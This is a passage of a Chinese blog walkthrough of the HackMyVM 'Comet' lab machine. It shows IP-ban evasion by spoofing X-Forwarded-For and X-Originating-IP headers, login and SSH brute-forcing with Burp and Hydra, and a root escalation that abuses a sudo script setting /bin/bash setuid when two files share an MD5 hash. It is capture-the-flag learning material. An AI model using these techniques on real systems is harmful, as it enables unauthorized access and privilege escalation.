<p>我用windows输错密码，结果就在ip.txt里面了<br>想着在请求头加个XFF伪造一下ip结果成功了<br><img src="https://ooo.0x0.ooo/2024/06/11/OJXNGK.png" alt="OJXNGK.png" loading="lazy"><br>既然如此，那用burpsuite爆破了<br>我擦，试了一下，发现又被ban了，奇了怪了，恶心的难受看了一眼wp<br>加个<code>X-Originating-IP: 0.0.0.0</code>头就可以了<br><img src="https://ooo.0x0.ooo/2024/06/11/OJXe3a.png" alt="OJXe3a.png" loading="lazy"><br><img src="https://ooo.0x0.ooo/2024/06/11/OJXAhS.png" alt="OJXAhS.png" loading="lazy"><br>爆破出来一个密码<code>solitario</code>，后来又测试了一下用X-Forwarded-For头也可以，但是爆破一会就会寄，不懂，不过头一回见到<code>X-Originating-IP</code>这个伪造ip的，记下来<br>拿到密码登录之后发现一堆日志文件<br><img src="https://ooo.0x0.ooo/2024/06/11/OJXKtN.png" alt="OJXKtN.png" loading="lazy"><br>看了几个没什么发现，发现最下面有个可执行文件</p>
<pre class="language-zsh" data-language="zsh"><code class="language-zsh">&gt; file firewall_update 
firewall_update: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter &#x2F;lib64&#x2F;ld-linux-x86-64.so.2, BuildID[sha1]&#x3D;c8b4cde0414ff49d15473b0d47cde256c7931587, for GNU&#x2F;Linux 3.2.0, not stripped</code></pre>
<p>64位可执行文件，反编译一下<br><img src="https://ooo.0x0.ooo/2024/06/11/OJXZjC.png" alt="OJXZjC.png" loading="lazy"></p>
<pre class="language-c" data-language="c"><code class="language-c"><span class="token keyword">int</span> __cdecl <span class="token function">main</span><span class="token punctuation">(</span><span class="token keyword">int</span> argc<span class="token punctuation">,</span> <span class="token keyword">const</span> <span class="token keyword">char</span> <span class="token operator">*</span><span class="token operator">*</span>argv<span class="token punctuation">,</span> <span class="token keyword">const</span> <span class="token keyword">char</span> <span class="token operator">*</span><span class="token operator">*</span>envp<span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
  <span class="token class-name">size_t</span> v3<span class="token punctuation">;</span> <span class="token comment">// rax</span>
  <span class="token keyword">char</span> s2<span class="token punctuation">[</span><span class="token number">80</span><span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token comment">// [rsp+0h] [rbp-F0h] BYREF</span>
  <span class="token keyword">char</span> s1<span class="token punctuation">[</span><span class="token number">80</span><span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token comment">// [rsp+50h] [rbp-A0h] BYREF</span>
  <span class="token keyword">char</span> s<span class="token punctuation">[</span><span class="token number">32</span><span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token comment">// [rsp+A0h] [rbp-50h] BYREF</span>
  <span class="token keyword">char</span> v8<span class="token punctuation">[</span><span class="token number">44</span><span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token comment">// [rsp+C0h] [rbp-30h] BYREF</span>
  <span class="token keyword">int</span> i<span class="token punctuation">;</span> <span class="token comment">// [rsp+ECh] [rbp-4h]</span>

  <span class="token function">strcpy</span><span class="token punctuation">(</span>s1<span class="token punctuation">,</span> <span class="token string">"b8728ab81a3c3391f5f63f39da72ee89f43f9a9f429bc8cfe858f8048eaad2b1"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"Enter password: "</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token function">__isoc99_scanf</span><span class="token punctuation">(</span><span class="token string">"%s"</span><span class="token punctuation">,</span> s<span class="token punctuation">)</span><span class="token punctuation">;</span>
  v3 <span class="token operator">=</span> <span class="token function">strlen</span><span class="token punctuation">(</span>s<span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token function">SHA256</span><span class="token punctuation">(</span>s<span class="token punctuation">,</span> v3<span class="token punctuation">,</span> v8<span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token keyword">for</span> <span class="token punctuation">(</span> i <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span> i <span class="token operator">&lt;=</span> <span class="token number">31</span><span class="token punctuation">;</span> <span class="token operator">++</span>i <span class="token punctuation">)</span>
    <span class="token function">sprintf</span><span class="token punctuation">(</span><span class="token operator">&amp;</span>s2<span class="token punctuation">[</span><span class="token number">2</span> <span class="token operator">*</span> i<span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token string">"%02x"</span><span class="token punctuation">,</span> <span class="token punctuation">(</span><span class="token keyword">unsigned</span> __int8<span class="token punctuation">)</span>v8<span class="token punctuation">[</span>i<span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token keyword">if</span> <span class="token punctuation">(</span> <span class="token operator">!</span><span class="token function">strcmp</span><span class="token punctuation">(</span>s1<span class="token punctuation">,</span> s2<span class="token punctuation">)</span> <span class="token punctuation">)</span>
    <span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"Firewall successfully updated"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token keyword">else</span>
    <span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"Incorrect password"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token keyword">return</span> <span class="token number">0</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span></code></pre>
<p>验证密码，用了sha256加密，解密一下看看<br><img src="https://ooo.0x0.ooo/2024/06/11/OJXyWL.png" alt="OJXyWL.png" loading="lazy"><br>这个哈希对应密码<code>prettywoman</code>，以为是owner用户的密码，登录发现失败，ssh也登录不上</p>
<pre class="language-bash" data-language="bash"><code class="language-bash"><span class="token operator">></span> <span class="token function">ssh</span> owner@192.168.56.182   
The authenticity of <span class="token function">host</span> <span class="token string">'192.168.56.182 (192.168.56.182)'</span> can<span class="token string">'t be established.
ED25519 key fingerprint is SHA256:s1UJuaVeu8UNzbo7FaamRo2EWZrzFXveeiWZyCxeJE0.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:72: [hashed name]
    ~/.ssh/known_hosts:74: [hashed name]
    ~/.ssh/known_hosts:110: [hashed name]
    ~/.ssh/known_hosts:114: [hashed name]
    ~/.ssh/known_hosts:116: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '</span><span class="token number">192.168</span>.56.182<span class="token string">' (ED25519) to the list of known hosts.
owner@192.168.56.182'</span>s password: 
Permission denied, please try again.</code></pre>
<h2 id="用户名爆破getshell"><a href="#用户名爆破getshell" class="headerlink" title="用户名爆破getshell"></a>用户名爆破getshell</h2><p>既然owner不对，用hydra爆破一下用户名</p>
<pre class="language-zsh" data-language="zsh"><code class="language-zsh">&gt; hydra -L &#x2F;usr&#x2F;share&#x2F;wordlists&#x2F;seclists&#x2F;Usernames&#x2F;xato-net-10-million-usernames.txt -p prettywoman  ssh:&#x2F;&#x2F;192.168.56.182
Hydra v9.5 (c) 2023 by van Hauser&#x2F;THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https:&#x2F;&#x2F;github.com&#x2F;vanhauser-thc&#x2F;thc-hydra) starting at 2024-06-11 17:49:19
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 8295455 login tries (l:8295455&#x2F;p:1), ~518466 tries per task
[DATA] attacking ssh:&#x2F;&#x2F;192.168.56.182:22&#x2F;
[22][ssh] host: 192.168.56.182   login: joe   password: prettywoman
[22][ssh] host: 192.168.56.182   login: joe   password: prettywoman</code></pre>
<p>爆破出来了!!!用户名<code>joe</code></p>
<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>先是拿到user flag</p>
<pre class="language-zsh" data-language="zsh"><code class="language-zsh">joe@comet:~$ id
uid&#x3D;1000(joe) gid&#x3D;1000(joe) groups&#x3D;1000(joe)
joe@comet:~$ ls -alh
total 32K
drwxr-xr-x 3 joe  joe  4.0K Feb 19  2023 .
drwxr-xr-x 3 root root 4.0K Feb 19  2023 ..
lrwxrwxrwx 1 root root    9 Feb 25  2023 .bash_history -&gt; &#x2F;dev&#x2F;null
-rw-r--r-- 1 joe  joe   220 Feb 19  2023 .bash_logout
-rw-r--r-- 1 joe  joe  3.5K Feb 19  2023 .bashrc
-rwxr-xr-x 1 root root  366 Feb 19  2023 coll
drwxr-xr-x 3 joe  joe  4.0K Feb 19  2023 .local
-rw-r--r-- 1 joe  joe   807 Feb 19  2023 .profile
-rwx------ 1 joe  joe    33 Feb 19  2023 user.txt
joe@comet:~$ cat user.txt 
cc32dbc17ec3ddf89f9e6d0991c82616</code></pre>
<p>看一下家目录有没有其他用户</p>
<pre class="language-zsh" data-language="zsh"><code class="language-zsh">joe@comet:&#x2F;home$ ls -al
total 12
drwxr-xr-x  3 root root 4096 Feb 19  2023 .
drwxr-xr-x 18 root root 4096 Feb 20  2023 ..
drwxr-xr-x  3 joe  joe  4096 Feb 19  2023 joe</code></pre>
<p>并没有，那么就在joe上提权了<br>习惯性的sudo一手</p>
<pre class="language-zsh" data-language="zsh"><code class="language-zsh">joe@comet:~$ sudo -l
Matching Defaults entries for joe on comet:
    env_reset, mail_badpass, secure_path&#x3D;&#x2F;usr&#x2F;local&#x2F;sbin\:&#x2F;usr&#x2F;local&#x2F;bin\:&#x2F;usr&#x2F;sbin\:&#x2F;usr&#x2F;bin\:&#x2F;sbin\:&#x2F;bin

User joe may run the following commands on comet:
    (ALL : ALL) NOPASSWD: &#x2F;bin&#x2F;bash &#x2F;home&#x2F;joe&#x2F;coll</code></pre>
<p>看一下coll这个shell脚本</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">joe@comet:~$ <span class="token function">cat</span> coll
<span class="token comment">#!/bin/bash</span>
<span class="token builtin class-name">exec</span> <span class="token operator"><span class="token file-descriptor important">2</span>></span>/dev/null

<span class="token assign-left variable">file1</span><span class="token operator">=</span>/home/joe/file1
<span class="token assign-left variable">file2</span><span class="token operator">=</span>/home/joe/file2
<span class="token assign-left variable">md5_1</span><span class="token operator">=</span><span class="token variable"><span class="token variable">$(</span>md5sum $file1 <span class="token operator">|</span> <span class="token function">awk</span> <span class="token string">'&#123;print $1&#125;'</span><span class="token variable">)</span></span>
<span class="token assign-left variable">md5_2</span><span class="token operator">=</span><span class="token variable"><span class="token variable">$(</span>md5sum $file2 <span class="token operator">|</span> <span class="token function">awk</span> <span class="token string">'&#123;print $1&#125;'</span><span class="token variable">)</span></span>


<span class="token keyword">if</span>      <span class="token punctuation">[</span><span class="token punctuation">[</span> <span class="token variable"><span class="token variable">$(</span><span class="token function">head</span> <span class="token parameter variable">-n</span> <span class="token number">1</span> $file1<span class="token variable">)</span></span> <span class="token operator">==</span> <span class="token string">"HMV"</span> <span class="token punctuation">]</span><span class="token punctuation">]</span> <span class="token operator">&amp;&amp;</span> 
        <span class="token punctuation">[</span><span class="token punctuation">[</span> <span class="token variable"><span class="token variable">$(</span><span class="token function">head</span> <span class="token parameter variable">-n</span> <span class="token number">1</span> $file2<span class="token variable">)</span></span> <span class="token operator">==</span> <span class="token string">"HMV"</span> <span class="token punctuation">]</span><span class="token punctuation">]</span> <span class="token operator">&amp;&amp;</span> 
        <span class="token punctuation">[</span><span class="token punctuation">[</span> <span class="token variable">$md5_1</span> <span class="token operator">==</span> <span class="token variable">$md5_2</span> <span class="token punctuation">]</span><span class="token punctuation">]</span> <span class="token operator">&amp;&amp;</span> 
        <span class="token punctuation">[</span><span class="token punctuation">[</span> <span class="token variable"><span class="token variable">$(</span><span class="token function">diff</span> <span class="token parameter variable">-q</span> $file1 $file2<span class="token variable">)</span></span> <span class="token punctuation">]</span><span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token keyword">then</span>
    <span class="token function">chmod</span> +s /bin/bash
    <span class="token builtin class-name">exit</span> <span class="token number">0</span>
<span class="token keyword">else</span>
    <span class="token builtin class-name">exit</span> <span class="token number">1</span>
<span class="token keyword">fi</span></code></pre>
<p>先求file1和file2的文件md5值，如果file1和file2文件的第一行都是HMV，并且两个文件的md5值相等，并且两个文件不同，那么就能拿到bash<br>想到了工具fastcoll,难道说这个脚本叫coll也是提示?<br>但是我的fastcoll是windows版的，为了避免系统差异，我先用kali生成一个HMV开头的文件，然后在windows上生成两个md5相同的不同文件，然后传到靶机</p>
<pre class="language-zsh" data-language="zsh"><code class="language-zsh"> ~&#x2F;Desktop                                                                                                         root@kali2  19:02:01 
&gt; echo HMV &gt; file                                                                                                           </code></pre>
<p><img src="https://ooo.0x0.ooo/2024/06/11/OJXggi.png" alt="OJXggi.png" loading="lazy"></p>
<pre class="language-zsh" data-language="zsh"><code class="language-zsh"> ~&#x2F;Desktop                                                                                                         root@kali2  19:02:12 
&gt; mv &#39;&#x2F;var&#x2F;run&#x2F;vmblock-fuse&#x2F;blockdir&#x2F;eniRjL&#x2F;msg1.bin&#39; file1                                                
 ~&#x2F;Desktop                                                                                                         root@kali2  19:03:01 
&gt; mv &#39;&#x2F;var&#x2F;run&#x2F;vmblock-fuse&#x2F;blockdir&#x2F;eniRjL&#x2F;msg2.bin&#39;  file2</code></pre>

<pre class="language-bash" data-language="bash"><code class="language-bash">joe@comet:~$ <span class="token function">wget</span> http://192.168.56.104:6677/file2
--2024-06-11 <span class="token number">13</span>:03:22--  http://192.168.56.104:6677/file2
Connecting to <span class="token number">192.168</span>.56.104:6677<span class="token punctuation">..</span>. connected.
HTTP request sent, awaiting response<span class="token punctuation">..</span>. <span class="token number">200</span> OK
Length: <span class="token number">192</span> <span class="token punctuation">[</span>application/octet-stream<span class="token punctuation">]</span>
Saving to: ‘file2.2’

file2.2                                 <span class="token number">100</span>%<span class="token punctuation">[</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">=</span><span class="token operator">></span><span class="token punctuation">]</span>     <span class="token number">192</span>  --.-KB/s    <span class="token keyword">in</span> 0s      

<span class="token number">2024</span>-06-11 <span class="token number">13</span>:03:22 <span class="token punctuation">(</span><span class="token number">3.69</span> MB/s<span class="token punctuation">)</span> - ‘file2.2’ saved <span class="token punctuation">[</span><span class="token number">192</span>/192<span class="token punctuation">]</span>
joe@comet:~$ <span class="token function">wget</span> http://192.168.56.104:6677/file2
--2024-06-11 <span class="token number">13</span>:04:15--  http://192.168.56.104:6677/file2
Connecting to <span class="token number">192.168</span>.56.104:6677<span class="token punctuation">..</span>. connected.
HTTP request sent, awaiting response<span class="token punctuation">..</span>. <span class="token number">200</span> OK
Length: <span class="token number">192</span> <span class="token punctuation">[</span>application/octet-stream<span class="token punctuation">]</span>
Saving to: ‘file2’

file2                                   <span class="token number">100</span>%<span class="token punctuation">[</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">=</span><span class="token operator">></span><span class="token punctuation">]</span>     <span class="token number">192</span>  --.-KB/s    <span class="token keyword">in</span> 0s      

<span class="token number">2024</span>-06-11 <span class="token number">13</span>:04:15 <span class="token punctuation">(</span><span class="token number">42.1</span> MB/s<span class="token punctuation">)</span> - ‘file2’ saved <span class="token punctuation">[</span><span class="token number">192</span>/192<span class="token punctuation">]</span>

joe@comet:~$ <span class="token function">head</span> <span class="token parameter variable">-n</span> <span class="token number">1</span> file2
HMV
joe@comet:~$ <span class="token function">sudo</span> <span class="token parameter variable">-l</span>
Matching Defaults entries <span class="token keyword">for</span> joe on comet:
    env_reset, mail_badpass, <span class="token assign-left variable">secure_path</span><span class="token operator">=</span>/usr/local/sbin<span class="token punctuation">\</span>:/usr/local/bin<span class="token punctuation">\</span>:/usr/sbin<span class="token punctuation">\</span>:/usr/bin<span class="token punctuation">\</span>:/sbin<span class="token punctuation">\</span>:/bin

User joe may run the following commands on comet:
    <span class="token punctuation">(</span>ALL <span class="token builtin class-name">:</span> ALL<span class="token punctuation">)</span> NOPASSWD: /bin/bash /home/joe/coll
joe@comet:~$ <span class="token function">sudo</span> /bin/bash /home/joe/coll
joe@comet:~$ <span class="token function">ls</span> <span class="token parameter variable">-al</span> /bin/bash
-rwsr-sr-x <span class="token number">1</span> root root <span class="token number">1234376</span> Mar <span class="token number">27</span>  <span class="token number">2022</span> /bin/bash
joe@comet:~$ <span class="token function">bash</span> <span class="token parameter variable">-p</span>
bash-5.1<span class="token comment"># id</span>
<span class="token assign-left variable">uid</span><span class="token operator">=</span><span class="token number">1000</span><span class="token punctuation">(</span>joe<span class="token punctuation">)</span> <span class="token assign-left variable">gid</span><span class="token operator">=</span><span class="token number">1000</span><span class="token punctuation">(</span>joe<span class="token punctuation">)</span> <span class="token assign-left variable">euid</span><span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">(</span>root<span class="token punctuation">)</span> <span class="token assign-left variable">egid</span><span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">(</span>root<span class="token punctuation">)</span> <span class="token assign-left variable">groups</span><span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">(</span>root<span class="token punctuation">)</span>,1000<span class="token punctuation">(</span>joe<span class="token punctuation">)</span>
bash-5.1<span class="token comment"># cat /r???/r*</span>
052cf26a6e7e33790391c0d869e2e40c</code></pre>



</div></section><ul class="post-copyright"><li class="post-copyright-author"><strong>本文作者：</strong>ta0</li><li class="post-copyright-link"><strong>本文链接：</strong><a href="https://tao0845.github.io/posts/151f8aa9/" title="HackMyVM-Comet">https://tao0845.github.io/posts/151f8aa9/</a></li><li class="post-copyright-license"><strong>版权声明：</strong>本博客所有文章除特别声明外，均默认采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 "><span class="icon iconify" data-icon="ri:creative-commons-line"></span><span class="icon iconify" data-icon="ri:creative-commons-by-line"></span><span class="icon iconify" data-icon="ri:creative-commons-nc-line"></span><span class="icon iconify" data-icon="ri:creative-commons-sa-line"></span></a> 许可协议。</li></ul></article><div class="post-nav"><div class="post-nav-item"><a class="post-nav-prev" href="/posts/50cc8bce/" rel="prev" title="HackMyVM-colors"><span class="icon iconify" data-icon="ri:arrow-left-s-line"></span><span class="post-nav-text">HackMyVM-colors</span></a></div><div class="post-nav-item"><a class="post-nav-next" href="/posts/bd91e42f/" rel="next" title="LitCTF2024未解题复现"><span class="post-nav-text">LitCTF2024未解题复现</span><span class="icon iconify" data-icon="ri:arrow-right-s-line"></span></a></div></div></div><div class="hty-card" id="comment"></div></main><footer class="sidebar-translate" id="footer"><div class="copyright"><span>&copy; 2019 – 2024 </span><span class="with-love" id="animate"><span class="icon iconify" data-icon="ri:cloud-line"></span></span><span class="author"> ta0</span></div><div class="powered"><span>由 <a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a> 驱动 v7.1.1</span><span class="footer-separator">|</span><span>主题 - <a rel="noopener" href="https://github.com/YunYouJun/hexo-theme-yun" target="_blank"><span>Yun</span></a> v1.10.11</span></div><div id="busuanzi"><span id="busuanzi_container_site_uv" title="总访客量"><span><span class="icon iconify" data-icon="ri:user-line"></span></span><span id="busuanzi_value_site_uv"></span></span><span class="footer-separator">|</span><span id="busuanzi_container_site_pv" title="总访问量"><span><span class="icon iconify" data-icon="ri:eye-line"></span></span><span id="busuanzi_value_site_pv"></span></span><script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></footer></div><a class="hty-icon-button" id="back-to-top" aria-label="back-to-top" href="#"><span class="icon iconify" data-icon="ri:arrow-up-s-line"></span><svg class="progress-circle-container" viewBox="0 0 100 100"><circle class="progress-circle" id="progressCircle" cx="50" cy="50" r="48" fill="none" stroke="#0078E7" stroke-width="2" stroke-linecap="round"></circle></svg></a><a class="popup-trigger hty-icon-button icon-search" id="search" href="javascript:;" title="搜索"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:search-line"></span></span></a><script>window.addEventListener("DOMContentLoaded", () => {
  // Handle and trigger popup window
  document.querySelector(".popup-trigger").addEventListener("click", () => {
    document.querySelector(".popup").classList.add("show");
    setTimeout(() => {
      document.querySelector(".search-input").focus();
    }, 100);
  });

  // Monitor main search box
  const onPopupClose = () => {
    document.querySelector(".popup").classList.remove("show");
  };

  document.querySelector(".popup-btn-close").addEventListener("click", () => {
    onPopupClose();
  });

  window.addEventListener("keyup", event => {
    if (event.key === "Escape") {
      onPopupClose();
    }
  });
});
</script><script src="https://fastly.jsdelivr.net/npm/hexo-generator-searchdb@1.4.0/dist/search.js"></script><script src="/js/search/local-search.js" defer type="module"></script><div class="popup search-popup"><div class="search-header"><span class="popup-btn-close close-icon hty-icon-button"><span class="icon iconify" data-icon="ri:close-line"></span></span></div><div class="search-input-container"><input class="search-input" id="local-search-input" type="text" placeholder="搜索..." value=""></div><div class="search-result-container"></div></div><script src="https://fastly.jsdelivr.net/npm/medium-zoom@1.0.6/dist/medium-zoom.min.js"></script><script>const images = [...document.querySelectorAll('.markdown-body img')]
mediumZoom(images)</script><style>.medium-zoom-image {
  z-index: 99;
}</style></body></html>